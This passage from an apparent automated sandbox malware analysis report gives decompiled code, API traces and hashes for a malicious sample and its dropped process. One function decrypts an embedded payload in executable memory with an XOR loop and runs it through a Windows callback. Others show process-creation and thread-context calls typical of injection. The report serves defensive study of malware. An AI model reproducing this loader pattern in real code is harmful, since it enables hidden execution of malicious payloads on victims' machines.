lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
lstrcatW.KERNEL32(?,0040A014), ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: jqenyeo.exePID: 6412, Parent PID: 6384COMMON

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	6.6%
Signature Coverage:	5.1%
Total number of Nodes:	1738
Total number of Limit Nodes:	107

Executed Functions

Function 009F03F8 Relevance: 10.7, APIs: 7, Instructions: 201
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F04DB
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 009F0502
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 009F0519
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 009F053D
FindCloseChangeNotification.KERNELBASE(00000000,?), ref: 009F05AE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 009F05B9
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 009F0611

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction ID: ab001c7450f0ffadd3c02436053da81a5904454c7c152ade357866f06239c13e
Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction Fuzzy Hash: 52617075E102189BCF10DBA5D884BBEBBB9AFC8710F148459FA05EB292D7B49D01CF54

Uniqueness

Uniqueness Score: -1.00%

Function 009F1196 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 009F12DA
GetThreadContext.KERNELBASE(?,00010007), ref: 009F12FD

Strings

D, xrefs: 009F1263

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 084e3f6b5054627029af3637fd3af2668ceac509277eee27f3ede2b51cd7b44c
Instruction ID: a7b549137a2df3ba946ac0a1e798d9644de3e5355b5efd94d6ea27ab08c55a9c
Opcode Fuzzy Hash: 084e3f6b5054627029af3637fd3af2668ceac509277eee27f3ede2b51cd7b44c
Instruction Fuzzy Hash: 39A1F470E0010DEFDB44DFA5C985BAEBBB9BF88304F1044A5E615EB291D774AA41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 009F1A5C Relevance: 10.7, APIs: 7, Instructions: 159
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.KERNELBASE(00000000), ref: 009F1B4E
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F1B78

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID: File$CreateExistsPath
String ID:
API String ID: 2955419453-0
Opcode ID: 211326630d16dbdff14aa4ac5dfa0c09c8d768efed6170e790a4e827189436b4
Instruction ID: a922a11ed648b39b00abce2bf8f3b5753751050bdf73d7dc11bb0ea8438309af
Opcode Fuzzy Hash: 211326630d16dbdff14aa4ac5dfa0c09c8d768efed6170e790a4e827189436b4
Instruction Fuzzy Hash: 8B513730E5024CEFDF10EBA0DD06BBEBBB9AF88711F204855E211FA2A0D7715A41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 009F0809 Relevance: 7.8, APIs: 5, Instructions: 318
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F0B32

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 46973cb8bccfb190590f14ff869c6600a5f73baddf4e3c97e105d0705c82c931
Instruction ID: 792fd6463cd1f3d43c66aae17fa9371263b3a06d662135cc6e84cd210f997f0c
Opcode Fuzzy Hash: 46973cb8bccfb190590f14ff869c6600a5f73baddf4e3c97e105d0705c82c931
Instruction Fuzzy Hash: ACC10125E50348A9DB60DBE4EC52BBDB7B5AF84B10F205497E608EE2E1D7711E80DB05

Uniqueness

Uniqueness Score: -1.00%

Function 004011BC Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00401B60(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00401829(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00401B60(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E004024C9())) = 0x22;
												L4:
												E004017EE();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0040194A(_t119)); // executed
											_t88 = E00401D04(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00401ADE(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E004024C9())) = 0x16;
				goto L4;
			}

0x004011c6
0x004011c9
0x004011cf
0x004011d2
0x004011d5
0x004011f2
0x00000000
0x004011f2
0x004011d7
0x004011dc
0x00000000
0x00000000
0x004011e0
0x004011fb
0x004011fe
0x00401200
0x0040120e
0x0040120e
0x00401212
0x0040121a
0x0040121f
0x0040121f
0x00401222
0x00401224
0x00000000
0x00401226
0x00401226
0x0040122e
0x00401230
0x00000000
0x00000000
0x00401232
0x00401235
0x00401238
0x0040123f
0x00401241
0x00401248
0x00401243
0x00401243
0x00401243
0x0040124d
0x00401250
0x00401252
0x0040133b
0x00000000
0x00401258
0x00401258
0x00401258
0x0040125f
0x004012a0
0x004012a0
0x004012a2
0x0040130d
0x00401313
0x00401316
0x0040136d
0x00000000
0x00401373
0x00401318
0x0040131b
0x0040131d
0x00401343
0x00401343
0x00401347
0x00401351
0x00401356
0x0040135e
0x004011ed
0x004011ed
0x00000000
0x004011ed
0x0040131f
0x00401322
0x00401325
0x00401326
0x00401329
0x00401329
0x0040132a
0x0040132d
0x00401330
0x00000000
0x00401330
0x004012a4
0x004012a6
0x004012ca
0x004012cf
0x004012d5
0x004012d7
0x004012d7
0x004012a8
0x004012aa
0x004012b0
0x004012c2
0x004012c2
0x004012c2
0x004012c4
0x004012b2
0x004012b7
0x004012b9
0x004012b9
0x004012c6
0x004012c6
0x004012d9
0x004012dc
0x00000000
0x004012de
0x004012de
0x004012df
0x004012e9
0x004012ea
0x004012ef
0x004012f2
0x004012f4
0x0040137b
0x00000000
0x0040137b
0x004012fa
0x004012fd
0x00401369
0x00401369
0x00401369
0x00401369
0x00000000
0x00401369
0x004012ff
0x004012ff
0x00401301
0x00401301
0x00401304
0x00401307
0x00000000
0x00401307
0x004012dc
0x00401261
0x00401264
0x00401267
0x00401269
0x00000000
0x00000000
0x0040126b
0x00000000
0x00000000
0x00401271
0x00401273
0x00401275
0x00401277
0x00401277
0x0040127a
0x0040127d
0x0040127f
0x00000000
0x00401285
0x0040128c
0x00401291
0x00401294
0x00401297
0x0040129a
0x0040129c
0x00000000
0x0040129c
0x00401333
0x00401333
0x00401333
0x00000000
0x00401258
0x00401252
0x00401224
0x00401207
0x0040120a
0x0040120c
0x00000000
0x00000000
0x00000000
0x0040120c
0x004011e2
0x004011e7
0x00000000

APIs

_memset.LIBCMT ref: 0040121A
_memcpy_s.LIBCMT ref: 0040128C
__read_nolock.LIBCMT ref: 004012EA
__filbuf.LIBCMT ref: 0040130D
_memset.LIBCMT ref: 00401351

Part of subcall function 004024C9: __getptd_noexit.LIBCMT ref: 004024C9

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 44d23312960692a40431b7708105da528cbf403d5d2f38dda23801874c8e3369
Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
Opcode Fuzzy Hash: 44d23312960692a40431b7708105da528cbf403d5d2f38dda23801874c8e3369
Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401000(struct HWND__* __eax, intOrPtr _a8) {
				void* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t20;
				void* _t23;

				_t23 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000); // executed
				_t9 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40); // executed
				_t20 = _t9;
				E00401381(_t20, 0x1c32, 1, _t8); // executed
				do {
					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
					_t23 = _t23 + 1;
				} while (_t23 < 0x1c32);
				EnumSystemCodePagesW(_t20, 0); // executed
				return 0;
			}

0x00401006
0x00401009
0x00401010
0x00401021
0x00401037
0x00401045
0x00401049
0x00401051
0x00401060
0x00401063
0x00401064
0x0040106b
0x00401077

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
ShowWindow.USER32(00000000), ref: 00401010

Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438

VirtualAlloc.KERNELBASE(00000000,00001C32,00003000,00000040), ref: 00401037
__fread_nolock.LIBCMT ref: 00401049
EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 0040106B

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
String ID:
API String ID: 2083855422-0
Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8

Uniqueness

Uniqueness Score: -1.00%

Function 009F145C Relevance: 4.9, APIs: 3, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfaf7d691fa9146c0dd1e46dfb69890e0d8b3ea591259c748d953abd61492ac
Instruction ID: 8406ee06771d3993390eae2bcca02a5905e42ded8ab89b9469d8ad81ad37edfe
Opcode Fuzzy Hash: 6bfaf7d691fa9146c0dd1e46dfb69890e0d8b3ea591259c748d953abd61492ac
Instruction Fuzzy Hash: 1AF12E25A5035CE9EB60CBE4EC11BFEB3B5AF88710F205497E60DEA290E7744AC0DB55

Uniqueness

Uniqueness Score: -1.00%

Function 009F199A Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.KERNELBASE(009F18E6,?,?,?,?,?,?,?,?,009F18E6,?), ref: 009F1A34
CreateDirectoryW.KERNELBASE(009F18E6,00000000,?,?,?,?,?,?,?,?,009F18E6,?), ref: 009F1A48

Memory Dump Source

Source File: 00000001.00000002.290403208.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_jqenyeo.jbxd

Similarity

API ID: CreateDirectoryExistsFilePath
String ID:
API String ID: 2624722123-0
Opcode ID: 70c337b4972ae758220606cb3897d8e3870516a05c4c65832b66cc75de0d2e5a
Instruction ID: 706cb113633784255a3aa859fb64c66fbd7ad62db4f2bd7808afd11f0a761cfe
Opcode Fuzzy Hash: 70c337b4972ae758220606cb3897d8e3870516a05c4c65832b66cc75de0d2e5a
Instruction Fuzzy Hash: 7F219625E6038CEADF50DBF4E811BBE77B5AF88710F205416E605FA2A0E7718E50D749

Uniqueness

Uniqueness Score: -1.00%

Function 0040139C Relevance: 3.0, APIs: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040139C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x411e60);
				E00402520(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00401A08(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E004011BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00401425(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00401B60( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E004024C9())) = 0x16;
						E004017EE();
						goto L6;
					}
				}
				return E00402565(_t16);
			}

0x0040139c
0x0040139e
0x004013a3
0x004013aa
0x004013b0
0x004013e3
0x004013e3
0x004013b7
0x004013b7
0x004013bc
0x004013ec
0x004013f2
0x00401402
0x0040140a
0x0040140c
0x0040140f
0x00401416
0x0040141b
0x004013be
0x004013c2
0x004013cb
0x004013d0
0x004013d8
0x004013de
0x00000000
0x004013de
0x004013bc
0x004013ea

APIs

_memset.LIBCMT ref: 004013CB
__lock_file.LIBCMT ref: 004013EC

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

